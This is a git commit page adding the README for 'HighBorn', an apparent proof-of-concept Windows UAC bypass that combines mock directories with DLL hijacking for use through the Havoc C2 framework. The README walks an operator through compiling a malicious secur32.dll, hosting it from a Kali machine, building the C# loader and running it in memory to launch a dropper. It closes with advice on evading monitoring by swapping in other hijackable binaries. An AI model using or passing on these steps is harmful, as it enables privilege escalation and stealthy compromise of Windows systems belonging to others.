فهرست منبع

Create ReadMe.md

assume-breach 3 سال پیش
والد
کامیت
e844aed4a5
1فایلهای تغییر یافته به همراه26 افزوده شده و 0 حذف شده
  1. 26 0
      HighBorn/ReadMe.md

+ 26 - 0
HighBorn/ReadMe.md

@@ -0,0 +1,26 @@
+Windows UAC Bypass utilizing mock directories and DLL Hijacking. This is a tool that I created to use with the "dotnet inline-execution" command on Havoc C2, but it can be used with any C2 that has in-memory execution. This was just a quick and dirty POC.
+
+**Usage:**
+
+Open the highborn.c file in a text editor on your Kali box.
+
+Replace the file path with the file path of the executable that you want to open (ie your dropper).
+
+Compile HighBorn.c into a dll.
+
+**linux command: "x86_64-w64-mingw32-gcc -shared -o secur32.dll highborn.c -lcomctl32 -Wl,--subsystem,windows**
+
+Host the dll on your Kali box.
+
+command: python3 -m http.server PORT
+
+Compile on Kali
+
+**apt install mono-complete -y
+mcs -out:HighBorn.exe Highborn.cs**
+
+Execute on C2
+
+**command: dotnet inline-execute HighBorn.exe**
+
+Replace the ComputerDefaults.exe and secur32.dll with other EXEs and DLLs as you find DLLs that can be hijacked. ComputerDefaults is a popular one is probably monitored pretty closely.